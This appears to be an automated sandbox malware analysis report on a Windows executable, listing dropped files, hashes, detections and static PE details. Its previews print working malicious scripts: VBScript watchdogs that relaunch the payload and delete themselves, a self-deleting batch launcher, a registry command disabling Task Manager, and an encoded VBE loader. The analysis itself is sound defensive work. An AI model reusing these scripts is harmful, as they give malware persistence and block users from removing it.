                                  SSDEEP:12:9vWdTzyMsRfhMA6KbFjMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VX:9AnyHfCATbFjI5pD/AEmHob/uhEjdxWo
                                  MD5:0916B74B80E35C3402FD11DECBFEBCCD
                                  SHA1:017A89195867C1139FE857B817CD7CE03AABDEE2
                                  SHA-256:0414F26B6BE7C05F319A95FD9E9FD19BAD22D375F80D3F53030DC999B518C0D6
                                  SHA-512:68D18424BC4B1136D041A08CB73C821B57A596BD0C4FFC81F1656471E4658E9A2F35DADD0B043186BAEE2B04D93A42CC561FD456D88C388EC5EAFD338FD0FC51
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "5336"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.267792721173823
                                  Encrypted:false
                                  SSDEEP:12:9vWdTzyMsRfhMA6K+jjMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VX:9AnyHfCATmjI5pD/AEmHob/uhEjdxWgr
                                  MD5:199CC6997FBE0DDD89EF8012E0000872
                                  SHA1:618BCA851F498951A655757A95F6030B353BE9F3
                                  SHA-256:1F5592815BFBB86614C6560FCB71CA596F72932949B3ACC8258A976ECA9E6F9C
                                  SHA-512:C6FF9914C64D4C5EA328550E16E067736ECE918F1B8855A598A5F9C67AD2A75184C7CF3D84CE6CB8F281B30C0EB6C0D42CCB5574F303A1B43E2CC74FC883C444
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "4460"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.268469827521438
                                  Encrypted:false
                                  SSDEEP:12:9vWdTzyMsRfhMA6KijMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbT:9AnyHfCATijI5pD/AEmHob/uhEjdxWgr
                                  MD5:B6E08A0656652882E8FCA165C74F7F3E
                                  SHA1:4C030BBC58882584C9B01C7D7289FCC87D4488DA
                                  SHA-256:2691A42C770B955DD480E57D4FA3B30DEB886DE4091D426E13E72E42B9D45DDB
                                  SHA-512:99CB03BFC24D33102C8B369F40561C3D9AEF52BA6F07C8BB8686F3BEC12C4CEB1DDB12754D7707FC54859C7E6B8C8261A41CA29F754AA05AC19D7CDC9C09EC17
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "2156"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat

                                  Download File
                                  Process:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):212
                                  Entropy (8bit):5.166156496265179
                                  Encrypted:false
                                  SSDEEP:6:hITg3Nou11r+DEmL34jqKOZG1qLTwi23fs:OTg9YDEmL34jEwZU
                                  MD5:CEA8F798BDEE851F68BD57FE7A6F8D92
                                  SHA1:7BA2BECE7E0046185E11670BF3E2803EF449604D
                                  SHA-256:E2F8D9D7A3880FFD4289BFECB15840866C6D6883B8769202A3FEF3F9AB3B9417
                                  SHA-512:6B0C849094322DEFF6B3F7CD05639A0AC9EF770D0960AA2D9BC4DAAF7757C1BFD8554BA9F3D56E8AD5827E226AED56754FCAE1A4A9255D2F2F61FDDED07170B9
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\suxlltqCa3.bat"

                                  C:\portcontainerRef\2a821a36bead33

                                  Download File
                                  Process:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  File Type:ASCII text, with very long lines (645), with no line terminators
                                  Category:dropped
                                  Size (bytes):645
                                  Entropy (8bit):5.863994949969072
                                  Encrypted:false
                                  SSDEEP:12:z5R+GR2xgXiPLna2uyVI/wKYi8UffM5FdxcjK8jcYxRzAtC2bZAmuAjfJsf/nIKx:z+GRP0BG38UffM5Fd6jBQYxRWDL1KIKx
                                  MD5:EB45FA3DDA1FDA4FDCCBB9AE1C0BE9EB
                                  SHA1:7BCB733506829232BE12EA29F3B3F2F6CFD0CB26
                                  SHA-256:A74506EA28CF7055D3B7D0B563E7873249DF39103D6E4B61624EEF295D4F519A
                                  SHA-512:72288690B4119B2A81FF2382B98E317FEEC562C1B7019E09CB8C0B8C83184F817C7CEB9A53B0BA74D3B9239855B9B77DF7A5E8D59A4256785A449869A629DD20
                                  Malicious:false
                                  Preview:ZSh4wo783q41tIr3qVrdB5xpvBIaxe3IEVjULiJzxh9GniLx6hnvUTmee1IvggLZxwwXjXrHL1qd5rCM0VeQ0HyvtEzUZYTQWkS1vyNi0gjcnJiwz54LC4iq8BnehWsxiZHVYLaCH5aUhVHkfDfddIObBm3uKtBdyw3NBNXne2DGeOIm3D8e1OUaLqTwSq1X47gvc4iRp18lEH6xdQ1GvgmjbdBV4lVyAqMhsXK9eqz9PtWEtgSByvmYU6T92NXDfKkY5ZEGG2lEqmUsG7lYTU9PDxMwDKGRTwdFI8JTbM46Jirslk25l9uLKUUHNSC5vUv4IPjIxS6GZDGfGdLdSKpTBS4ynBGJJ8KywwjVAtHTDnvHNzAtHjnkpb30UvfvLw6b2StU4zciDVQXgxkyBXCkVjJU2tAPOVIQrUO5GqyRGEhTLfThLquxtVGSIYbLyMTrNAqMjosViudQC0JXZdEhlUgVN6xrOnd4v0FLzH8g8ZP820QSOEwUIvF2dV8m1AG4RjfLu8iRfhjMFhcXpedK1Iv9uMrdIVp8SUrSUEiQfezlM3x52k6Wh5DJyfahQEIK2l3v0KCk6NoXTKw1ZwkhYSbWRieyoA9bVoslACEshVZTRq0ntjHedlvjJgeSqO66O

                                  C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat

                                  Download File
                                  Process:C:\Users\user\Desktop\adKGhCOOzg.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):161
                                  Entropy (8bit):4.951181800240838
                                  Encrypted:false
                                  SSDEEP:3:I5Sg+0XpCaxAmEEMLAXLuRLNZFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMG:IeDEMrRJMTStuH1jhRiI36BY
                                  MD5:371DA64FC84F83CB1B5AE7FABA9927FE
                                  SHA1:3526490D11640D16C32AD6DCDDBC78CF018686A2
                                  SHA-256:E3D7262FB87454906DB6BB5B65F6168530B85D07F14DE69DEE92DA03180AFB29
                                  SHA-512:6403EF908EC22260F2BF5115D65EB281ABA3CD285B552A6F1FA1C1C9BA799A871D05E6567D8BA04CE1B994E97DAC6E75709E64EB0AE213AF7380274AB40D0552
                                  Malicious:false
                                  Preview:"C:\portcontainerRef\SurrogateContainerAgent.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

                                  C:\portcontainerRef\SurrogateContainerAgent.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\adKGhCOOzg.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):2782208
                                  Entropy (8bit):7.685464955987241
                                  Encrypted:false
                                  SSDEEP:49152:Vk73hA8MYZbnMDVypc/Ku+hFH2utwyQy84y9Rnpx3oOo:VKhdMY4Z6cyBXtVQX4y9RnXoOo
                                  MD5:7AF97370DBD8A244A113783A7021E677
                                  SHA1:3A15EF2435B16954403930D061D598EF1CA48E1F
                                  SHA-256:B10060B21CB1941F76925B372BEC819C564CDD69B644296161E63F8F199CF2DA
                                  SHA-512:AA05D77154058960AD0BDADE092FB24C214D7E5895AF73B4D76E43A491437F4B96DA9650951725A99AD9451FE249AC461BB1D92A89A1DE0C0CB5FAD9EFB1E36A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 88%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:*..6.......Y*.. ...`*...@.. ........................*...........@..................................X*.K.....*.......................*...................................................... ............... ..H............text...$9*.. ...:*................. ..`.sdata.../...`*..0...>*.............@....rsrc.........*......n*.............@..@.reloc........*......r*.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\portcontainerRef\myQbMgAKm.vbe

                                  Download File
                                  Process:C:\Users\user\Desktop\adKGhCOOzg.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):214
                                  Entropy (8bit):5.837679066205144
                                  Encrypted:false
                                  SSDEEP:6:G3wqK+NkLzWbHhE18nZNDd3RL1wQJRAJDL4W6/YWs:G+MCzWLy14d3XBJGJKQ1
                                  MD5:AAE82A345D8F0A5AC210D8953D1AFFE6
                                  SHA1:9117A1BEF411A4FD79AE0866363E8ADC3FE9126E
                                  SHA-256:9D5D31A9259C91C5E687D754BB203DD4E6DC546C28530970868D6B1D173CAE05
                                  SHA-512:EFAA59A4F026FD04DB780A00296733DD840725EA357E13563CA4A7871F16934E3DD824B967D2CC7DBB2E68BF6EFFA784B624B3BDDE78A11B9D097B19FAFB74C4
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:#@~^vQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJwGMY1WxDlbU+MIn0J9f*UZKGnx$ ZA.r}N3}EWR8CDJSPZSP6lsd.VTwAAA==^#~@.

                                  C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe

                                  Download File
                                  Process:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):2782208
                                  Entropy (8bit):7.685464955987241
                                  Encrypted:false
                                  SSDEEP:49152:Vk73hA8MYZbnMDVypc/Ku+hFH2utwyQy84y9Rnpx3oOo:VKhdMY4Z6cyBXtVQX4y9RnXoOo
                                  MD5:7AF97370DBD8A244A113783A7021E677
                                  SHA1:3A15EF2435B16954403930D061D598EF1CA48E1F
                                  SHA-256:B10060B21CB1941F76925B372BEC819C564CDD69B644296161E63F8F199CF2DA
                                  SHA-512:AA05D77154058960AD0BDADE092FB24C214D7E5895AF73B4D76E43A491437F4B96DA9650951725A99AD9451FE249AC461BB1D92A89A1DE0C0CB5FAD9EFB1E36A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 88%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:*..6.......Y*.. ...`*...@.. ........................*...........@..................................X*.K.....*.......................*...................................................... ............... ..H............text...$9*.. ...:*................. ..`.sdata.../...`*..0...>*.............@....rsrc.........*......n*.............@..@.reloc........*......r*.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  \Device\Null

                                  Download File
                                  Process:C:\Windows\System32\w32tm.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):151
                                  Entropy (8bit):4.842311201176073
                                  Encrypted:false
                                  SSDEEP:3:VLV993J+miJWEoJ8FXuKFzbH5k6vpIc66vj:Vx993DEUS5z5ug
                                  MD5:566A6A2BF7DD69A23A1FCAEF4D4AC75C
                                  SHA1:BD0DEF6889997567DA402A79F7AAB59A0952BE14
                                  SHA-256:E8B2C27DAA82926B959FC365466F9B5EAFEE9EBADCE601B54FD2CA1C7D94F8B8
                                  SHA-512:FF8A2A71B84BBF62A63DC103FF77D0D768B9E67E7DDB7E7B0D789AA45C6FA20BA1934286E0733CDE56D5C4B5F95621706520E01BF2B6F1564E51A643EEF0DF78
                                  Malicious:false
                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 27/09/2024 04:39:11..04:39:11, error: 0x80072746.04:39:17, error: 0x80072746.

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.628383756746391
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:adKGhCOOzg.exe
                                  File size:3'099'403 bytes
                                  MD5:3b5ae0315b4623a6bd2c711bc8b8e28f
                                  SHA1:ff99120c5150373aba0c519417fa4b545c70d4ca
                                  SHA256:af20afbe249de8d37ecdae69670fdced02fdfbbfdf7a1f2810e7628b52e29e4c
                                  SHA512:61f363a058f3e713b8fbe8234432f589ca38a41243a3bbeb36fef05c95f15501dc158fee0d00f148f15b81670321696d0446fb2ffd983771c398ab279c1a626d
                                  SSDEEP:49152:UbA30ck73hA8MYZbnMDVypc/Ku+hFH2utwyQy84y9Rnpx3oOof:Ub4KhdMY4Z6cyBXtVQX4y9RnXoOof
                                  TLSH:28E5E0027F508A11F1191637D2EF854847B4ED512AAAE32B7EBD376D99123933C0DACB
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

                                  File Icon

                                  Icon Hash:1515d4d4442f2d2d

                                  Static PE Info

                                  General

                                  Entrypoint:0x41ec40
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                                  Entrypoint Preview

                                  Instruction
                                  call 00007F985D104609h
                                  jmp 00007F985D10401Dh
                                  cmp ecx, dword ptr [0043E668h]
                                  jne 00007F985D104195h
                                  ret
                                  jmp 00007F985D10478Eh
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  push dword ptr [ebp+08h]
                                  mov esi, ecx
                                  call 00007F985D0F6F27h
                                  mov dword ptr [esi], 00435580h
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  and dword ptr [ecx+04h], 00000000h
                                  mov eax, ecx
                                  and dword ptr [ecx+08h], 00000000h
                                  mov dword ptr [ecx+04h], 00435588h
                                  mov dword ptr [ecx], 00435580h
                                  ret
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  lea eax, dword ptr [ecx+04h]
                                  mov dword ptr [ecx], 00435568h
                                  push eax
                                  call 00007F985D10732Dh
                                  pop ecx
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 0Ch
                                  lea ecx, dword ptr [ebp-0Ch]
                                  call 00007F985D0F6EBEh
                                  push 0043B704h
                                  lea eax, dword ptr [ebp-0Ch]
                                  push eax
                                  call 00007F985D106A42h
                                  int3
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 0Ch
                                  lea ecx, dword ptr [ebp-0Ch]
                                  call 00007F985D104134h
                                  push 0043B91Ch
                                  lea eax, dword ptr [ebp-0Ch]
                                  push eax
                                  call 00007F985D106A25h
                                  int3
                                  jmp 00007F985D108A73h
                                  jmp dword ptr [00433260h]
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  push 00421EB0h
                                  push dword ptr fs:[00000000h]

                                  Rich Headers

                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [C++] VS2015 UPD3.1 build 24215
                                  • [EXP] VS2015 UPD3.1 build 24215
                                  • [RES] VS2015 UPD3 build 24213
                                  • [LNK] VS2015 UPD3.1 build 24215

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x630000xdfd00xe000f6c0f34fae6331b50a7ad2efc4bfefdbFalse0.6370326450892857data6.6367506404157535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                  PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                  RT_ICON0x657480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                  RT_ICON0x65cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                  RT_ICON0x665580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                  RT_ICON0x674000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                  RT_ICON0x678680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                  RT_ICON0x689100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                  RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                  RT_DIALOG0x6f5880x286dataEnglishUnited States0.5092879256965944
                                  RT_DIALOG0x6f3580x13adataEnglishUnited States0.60828025477707
                                  RT_DIALOG0x6f4980xecdataEnglishUnited States0.6991525423728814
                                  RT_DIALOG0x6f2280x12edataEnglishUnited States0.5927152317880795
                                  RT_DIALOG0x6eef00x338dataEnglishUnited States0.45145631067961167
                                  RT_DIALOG0x6ec980x252dataEnglishUnited States0.5757575757575758
                                  RT_STRING0x6ff680x1e2dataEnglishUnited States0.3900414937759336
                                  RT_STRING0x701500x1ccdataEnglishUnited States0.4282608695652174
                                  RT_STRING0x703200x1b8dataEnglishUnited States0.45681818181818185
                                  RT_STRING0x704d80x146dataEnglishUnited States0.5153374233128835
                                  RT_STRING0x706200x446dataEnglishUnited States0.340036563071298
                                  RT_STRING0x70a680x166dataEnglishUnited States0.49162011173184356
                                  RT_STRING0x70bd00x152dataEnglishUnited States0.5059171597633136
                                  RT_STRING0x70d280x10adataEnglishUnited States0.49624060150375937
                                  RT_STRING0x70e380xbcdataEnglishUnited States0.6329787234042553
                                  RT_STRING0x70ef80xd6dataEnglishUnited States0.5747663551401869
                                  RT_GROUP_ICON0x6ec300x68dataEnglishUnited States0.7019230769230769
                                  RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                  Imports

                                  DLLImport
